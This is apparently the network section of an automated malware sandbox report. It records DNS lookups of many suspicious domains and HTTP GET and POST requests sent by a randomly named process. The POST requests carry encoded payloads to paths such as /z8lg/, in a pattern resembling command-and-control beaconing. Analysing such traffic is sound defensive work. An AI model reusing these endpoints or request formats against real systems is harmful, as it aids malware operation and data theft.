                                                                                                                          Jan 10, 2025 16:44:59.877043962 CET805002093.127.192.201192.168.2.5
                                                                                                                          Jan 10, 2025 16:44:59.880062103 CET5002080192.168.2.593.127.192.201
                                                                                                                          Jan 10, 2025 16:44:59.897289991 CET5002080192.168.2.593.127.192.201
                                                                                                                          Jan 10, 2025 16:44:59.902285099 CET805002093.127.192.201192.168.2.5
                                                                                                                          Jan 10, 2025 16:45:00.490494013 CET805002093.127.192.201192.168.2.5
                                                                                                                          Jan 10, 2025 16:45:00.493026972 CET805002093.127.192.201192.168.2.5
                                                                                                                          Jan 10, 2025 16:45:00.493092060 CET5002080192.168.2.593.127.192.201
                                                                                                                          Jan 10, 2025 16:45:00.495496035 CET5002080192.168.2.593.127.192.201
                                                                                                                          Jan 10, 2025 16:45:00.500266075 CET805002093.127.192.201192.168.2.5
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 10, 2025 16:41:46.649641991 CET5018253192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:41:47.074762106 CET53501821.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:03.064502001 CET5115353192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:42:03.124723911 CET53511531.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:16.430968046 CET5196353192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:42:16.440654993 CET53519631.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:24.519157887 CET4927753192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:42:24.530720949 CET53492771.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:38.086899996 CET5193153192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:42:38.105012894 CET53519311.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:52.430757999 CET5414353192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:42:52.636511087 CET53541431.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:43:06.027600050 CET5518853192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:43:06.045205116 CET53551881.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:43:19.383863926 CET6159453192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:43:19.392745018 CET53615941.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:43:27.446192980 CET5056553192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:43:27.722896099 CET53505651.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:43:40.853557110 CET6535753192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:43:41.100325108 CET53653571.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:43:54.947181940 CET6424153192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:43:55.021745920 CET53642411.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:44:08.429542065 CET5458253192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:44:08.444703102 CET53545821.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:44:16.509423018 CET5053953192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:44:16.524630070 CET53505391.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:44:29.682984114 CET5819853192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:44:29.692915916 CET53581981.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:44:37.760880947 CET5334553192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:44:38.600763083 CET53533451.1.1.1192.168.2.5
                                                                                                                          Jan 10, 2025 16:44:52.168893099 CET6291353192.168.2.51.1.1.1
                                                                                                                          Jan 10, 2025 16:44:52.220618963 CET53629131.1.1.1192.168.2.5
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 10, 2025 16:41:46.649641991 CET192.168.2.51.1.1.10x7e26Standard query (0)www.f5jh81t3k1w8.sbsA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:03.064502001 CET192.168.2.51.1.1.10x9099Standard query (0)www.lmueller.devA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:16.430968046 CET192.168.2.51.1.1.10x723fStandard query (0)www.valdevez.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:24.519157887 CET192.168.2.51.1.1.10x46bcStandard query (0)www.valuault.storeA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:38.086899996 CET192.168.2.51.1.1.10x6b11Standard query (0)www.odvfr.infoA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:52.430757999 CET192.168.2.51.1.1.10xd240Standard query (0)www.fersigorta.xyzA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:06.027600050 CET192.168.2.51.1.1.10xfc63Standard query (0)www.vh5g.sbsA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:19.383863926 CET192.168.2.51.1.1.10xd75Standard query (0)www.envisionmedia.shopA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:27.446192980 CET192.168.2.51.1.1.10x74b6Standard query (0)www.marketyemen.holdingsA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:40.853557110 CET192.168.2.51.1.1.10xcca9Standard query (0)www.deacapalla.onlineA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:54.947181940 CET192.168.2.51.1.1.10x26e3Standard query (0)www.100millionjobs.africaA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:08.429542065 CET192.168.2.51.1.1.10xaa5dStandard query (0)www.elettrocoltura.infoA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:16.509423018 CET192.168.2.51.1.1.10x8c82Standard query (0)www.axis138ae.shopA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:29.682984114 CET192.168.2.51.1.1.10xe53fStandard query (0)www.reynamart.storeA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:37.760880947 CET192.168.2.51.1.1.10x8681Standard query (0)www.x3kwqc5tye4vl90y.topA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:52.168893099 CET192.168.2.51.1.1.10x628Standard query (0)www.al-madinatraders.shopA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Jan 10, 2025 16:41:47.074762106 CET1.1.1.1192.168.2.50x7e26No error (0)www.f5jh81t3k1w8.sbs154.213.39.66A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:03.124723911 CET1.1.1.1192.168.2.50x9099No error (0)www.lmueller.dev46.38.243.234A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:16.440654993 CET1.1.1.1192.168.2.50x723fName error (3)www.valdevez.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:24.530720949 CET1.1.1.1192.168.2.50x46bcNo error (0)www.valuault.store209.74.79.42A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:38.105012894 CET1.1.1.1192.168.2.50x6b11No error (0)www.odvfr.info47.254.140.255A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:52.636511087 CET1.1.1.1192.168.2.50xd240No error (0)www.fersigorta.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:52.636511087 CET1.1.1.1192.168.2.50xd240No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:42:52.636511087 CET1.1.1.1192.168.2.50xd240No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:06.045205116 CET1.1.1.1192.168.2.50xfc63No error (0)www.vh5g.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:06.045205116 CET1.1.1.1192.168.2.50xfc63No error (0)www.vh5g.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:19.392745018 CET1.1.1.1192.168.2.50xd75Name error (3)www.envisionmedia.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:27.722896099 CET1.1.1.1192.168.2.50x74b6No error (0)www.marketyemen.holdings199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:41.100325108 CET1.1.1.1192.168.2.50xcca9No error (0)www.deacapalla.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:55.021745920 CET1.1.1.1192.168.2.50x26e3No error (0)www.100millionjobs.africa100millionjobs.africaCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:43:55.021745920 CET1.1.1.1192.168.2.50x26e3No error (0)100millionjobs.africa136.243.64.147A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:08.444703102 CET1.1.1.1192.168.2.50xaa5dName error (3)www.elettrocoltura.infononenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:16.524630070 CET1.1.1.1192.168.2.50x8c82No error (0)www.axis138ae.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:16.524630070 CET1.1.1.1192.168.2.50x8c82No error (0)www.axis138ae.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:16.524630070 CET1.1.1.1192.168.2.50x8c82No error (0)www.axis138ae.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:16.524630070 CET1.1.1.1192.168.2.50x8c82No error (0)www.axis138ae.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:16.524630070 CET1.1.1.1192.168.2.50x8c82No error (0)www.axis138ae.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:16.524630070 CET1.1.1.1192.168.2.50x8c82No error (0)www.axis138ae.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:16.524630070 CET1.1.1.1192.168.2.50x8c82No error (0)www.axis138ae.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:29.692915916 CET1.1.1.1192.168.2.50xe53fName error (3)www.reynamart.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:38.600763083 CET1.1.1.1192.168.2.50x8681No error (0)www.x3kwqc5tye4vl90y.topzcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:38.600763083 CET1.1.1.1192.168.2.50x8681No error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:38.600763083 CET1.1.1.1192.168.2.50x8681No error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:52.220618963 CET1.1.1.1192.168.2.50x628No error (0)www.al-madinatraders.shopal-madinatraders.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 10, 2025 16:44:52.220618963 CET1.1.1.1192.168.2.50x628No error (0)al-madinatraders.shop93.127.192.201A (IP address)IN (0x0001)false
                                                                                                                          • www.f5jh81t3k1w8.sbs
                                                                                                                          • www.lmueller.dev
                                                                                                                          • www.valuault.store
                                                                                                                          • www.odvfr.info
                                                                                                                          • www.fersigorta.xyz
                                                                                                                          • www.vh5g.sbs
                                                                                                                          • www.marketyemen.holdings
                                                                                                                          • www.deacapalla.online
                                                                                                                          • www.100millionjobs.africa
                                                                                                                          • www.axis138ae.shop
                                                                                                                          • www.x3kwqc5tye4vl90y.top
                                                                                                                          • www.al-madinatraders.shop
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.549904154.213.39.66802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:41:47.097542048 CET579OUTGET /blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw== HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:41:48.012099981 CET691INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 10 Jan 2025 15:41:47 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 548
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.54997746.38.243.234802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:03.144748926 CET827OUTPOST /z8lg/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.lmueller.dev
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.lmueller.dev
                                                                                                                          Referer: http://www.lmueller.dev/z8lg/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 51 38 47 56 30 71 4e 45 62 66 63 4f 47 4a 6a 35 56 47 30 6a 6c 61 34 55 68 2b 56 66 61 65 62 50 75 73 32 58 7a 4e 77 41 58 51 2f 33 44 43 5a 30 61 53 53 54 4d 4f 72 50 4b 64 50 4a 33 37 57 4d 50 46 45 6a 70 45 55 54 4a 57 46 74 38 36 35 70 52 69 65 4b 33 54 76 69 66 54 45 6d 48 6e 33 4b 6a 6e 33 58 32 38 4a 6b 49 48 7a 76 62 31 73 67 7a 67 5a 54 55 59 6c 49 62 64 50 30 39 6e 48 6b 6e 78 32 6b 56 65 33 51 47 31 56 38 30 63 65 35 46 62 5a 32 4d 4a 65 66 58 76 37 67 57 4b 6e 30 2b 77 31 48 64 43 2b 68 56 6a 45 68 38 64 4f 72 51 38 47 30 56 61 56 6b 67 49 4c 6c 4e 6c 42 75 73 50 6b 4e 46 30 73 3d
                                                                                                                          Data Ascii: V8=Q8GV0qNEbfcOGJj5VG0jla4Uh+VfaebPus2XzNwAXQ/3DCZ0aSSTMOrPKdPJ37WMPFEjpEUTJWFt865pRieK3TvifTEmHn3Kjn3X28JkIHzvb1sgzgZTUYlIbdP09nHknx2kVe3QG1V80ce5FbZ2MJefXv7gWKn0+w1HdC+hVjEh8dOrQ8G0VaVkgILlNlBusPkNF0s=
                                                                                                                          Jan 10, 2025 16:42:03.773226023 CET458INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:39:22 GMT
                                                                                                                          Server: Apache/2.4.10 (Debian)
                                                                                                                          Content-Length: 278
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.54997846.38.243.234802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:05.682810068 CET847OUTPOST /z8lg/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.lmueller.dev
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.lmueller.dev
                                                                                                                          Referer: http://www.lmueller.dev/z8lg/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 51 38 47 56 30 71 4e 45 62 66 63 4f 46 6f 7a 35 5a 46 73 6a 69 36 34 4c 76 65 56 66 52 2b 62 31 75 73 36 58 7a 4a 4a 48 55 6a 58 33 43 6a 70 30 41 54 53 54 41 75 72 50 42 39 50 41 71 72 57 78 50 46 4a 65 70 46 6f 54 4a 57 35 74 38 2b 39 70 51 54 65 4a 33 44 76 67 48 6a 45 34 4b 48 33 4b 6a 6e 33 58 32 2f 30 44 49 48 72 76 63 45 63 67 79 42 5a 51 58 59 6c 48 63 64 50 30 35 6e 48 34 6e 78 32 47 56 66 72 2b 47 33 64 38 30 64 75 35 45 4b 5a 31 43 4a 65 64 5a 50 37 2f 61 49 57 74 35 47 31 79 62 44 61 6e 4a 42 51 65 30 4c 2f 42 4b 65 4f 63 47 36 35 63 77 62 44 53 63 56 67 48 32 73 30 39 62 6a 34 75 4d 57 4e 57 48 4b 4f 41 6c 64 79 4e 4b 6e 4e 64 65 6b 74 6a
                                                                                                                          Data Ascii: V8=Q8GV0qNEbfcOFoz5ZFsji64LveVfR+b1us6XzJJHUjX3Cjp0ATSTAurPB9PAqrWxPFJepFoTJW5t8+9pQTeJ3DvgHjE4KH3Kjn3X2/0DIHrvcEcgyBZQXYlHcdP05nH4nx2GVfr+G3d80du5EKZ1CJedZP7/aIWt5G1ybDanJBQe0L/BKeOcG65cwbDScVgH2s09bj4uMWNWHKOAldyNKnNdektj
                                                                                                                          Jan 10, 2025 16:42:06.316595078 CET458INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:39:25 GMT
                                                                                                                          Server: Apache/2.4.10 (Debian)
                                                                                                                          Content-Length: 278
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.54997946.38.243.234802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:08.238205910 CET1864OUTPOST /z8lg/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.lmueller.dev
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.lmueller.dev
                                                                                                                          Referer: http://www.lmueller.dev/z8lg/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 51 38 47 56 30 71 4e 45 62 66 63 4f 46 6f 7a 35 5a 46 73 6a 69 36 34 4c 76 65 56 66 52 2b 62 31 75 73 36 58 7a 4a 4a 48 55 6c 50 33 44 52 68 30 61 30 75 54 4f 4f 72 50 4d 64 50 46 71 72 57 67 50 46 67 5a 70 46 6c 6f 4a 51 39 74 38 64 6c 70 59 42 32 4a 6b 6a 76 67 62 54 45 6c 48 6e 33 6c 6a 6e 6e 54 32 38 63 44 49 48 72 76 63 48 45 67 30 51 5a 51 52 59 6c 49 62 64 50 47 39 6e 48 63 6e 31 61 38 56 66 76 41 47 45 6c 38 7a 39 2b 35 48 34 78 31 4b 4a 65 54 61 50 36 71 61 49 61 49 35 47 42 49 62 44 2f 77 4a 44 41 65 30 50 53 41 55 4f 2b 49 64 62 56 6f 37 6f 62 65 45 6c 56 6b 2b 4b 30 56 58 43 74 42 51 32 42 70 42 4b 32 58 74 4f 66 4b 59 42 6c 5a 58 44 77 31 52 38 47 53 75 64 57 4b 49 61 36 77 79 48 42 4b 57 66 65 4c 6c 47 66 4b 58 73 6c 39 51 75 43 2f 6d 4c 67 73 35 4e 79 54 6e 61 68 54 47 71 51 6d 51 63 5a 61 50 30 58 74 70 75 53 47 36 46 79 43 70 32 6f 6a 43 38 69 76 4f 4b 44 31 4e 76 53 72 6e 66 66 31 49 49 79 56 68 7a 48 68 52 36 33 73 62 53 53 6b 4f 4b 68 37 72 6b 30 30 58 39 57 42 68 31 65 [TRUNCATED]
                                                                                                                          Data Ascii: V8=Q8GV0qNEbfcOFoz5ZFsji64LveVfR+b1us6XzJJHUlP3DRh0a0uTOOrPMdPFqrWgPFgZpFloJQ9t8dlpYB2JkjvgbTElHn3ljnnT28cDIHrvcHEg0QZQRYlIbdPG9nHcn1a8VfvAGEl8z9+5H4x1KJeTaP6qaIaI5GBIbD/wJDAe0PSAUO+IdbVo7obeElVk+K0VXCtBQ2BpBK2XtOfKYBlZXDw1R8GSudWKIa6wyHBKWfeLlGfKXsl9QuC/mLgs5NyTnahTGqQmQcZaP0XtpuSG6FyCp2ojC8ivOKD1NvSrnff1IIyVhzHhR63sbSSkOKh7rk00X9WBh1ex5bs4bJdtl30tJC2VqGN0rh9qm84S58Eujz7ylwlgjs2cgKvnRbABBEykzV70owjqzGJXcMf+4iSUZ50wpmikJf0UdrnI4pVSPraJ/CuqwNiPLlQhOFhk1JEFEUnMrTeoyTAn8DF7LEpqZ17iT7DPfFi4wAfjoNOu79cIAFkXoPh8tQh43G6PSfcYD7WETtNmppqbQzTX+p7PROKrMGjoqhnk2b11vRTYJ3Llzt0chr/jZ4NyYnMPYzgofrFUYhdIc35m7jULCZJLIShv4fLgQyrISxfLjTHBz7vCyoqhAxBTZlrzIEvC5j8ymPKoyIbl5kH1zG70MHNGdOWOiUxYanPdEG1lt//bIUrQ5d2Xg7iOVnDHPtwSTLNcgLK+qT8lPUUZVNZn/z7s3JkkjCKFcmd/4AQ3qfdZjI3vodxC3/s8Xl6VxAZtEaP0ar8XdYzfEPVh2CmVZycwmO7G9p9QG6KAuYTMeo4vrTlJb4mUxEZLzB/7yb5D+eiQn6t5QJ0+GZPBbHZ8VRf9FDi8y0S1/zivprxgdfNBH2xpvw+3ccWooPorU/3iC2y7xZhjoTEOktkLTsvZmeAsm9fLzp0/mFFGZz9Ug+LlxjmR4tf0FmkeKBT3/LMN1Z+NaZuS+c61F2t+PlTN5qAS3D5bOvj50bsjEeJr5lVbF [TRUNCATED]
